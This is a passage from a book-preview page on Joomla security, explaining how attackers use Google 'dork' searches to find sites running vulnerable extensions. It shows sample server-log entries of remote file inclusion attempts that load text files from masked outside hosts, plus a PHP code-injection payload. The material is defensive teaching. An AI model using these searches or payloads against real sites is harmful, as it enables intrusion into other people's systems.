Book Image

Joomla! Web Security

Book Image

Joomla! Web Security

Overview of this book

Table of Contents (16 chapters)
Joomla! Web Security
Credits
About the Author
About the Reviewer
Preface

Finding Targets to Attack


A "Dork" is a Google search to locate targets. Those targets can be simply a specific version of an extension or a device such as a webcam on a specific port.

Let us say a bad guy finds out that the extension is vulnerable from one of the many exploits or responsible disclosure sites. He or she could Google all the targets like this:

inurl:"/com_example/"

In this example, the com_example would be the extension you are searching for. Once this search is run, it will yield a lovely list of targets.

This sort of thing happens every time a new exploit is reported. Everyone rushes out to try and break into your site. You want to watch your logs such as this:

http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt??

/?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt?

/poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http

These are three examples...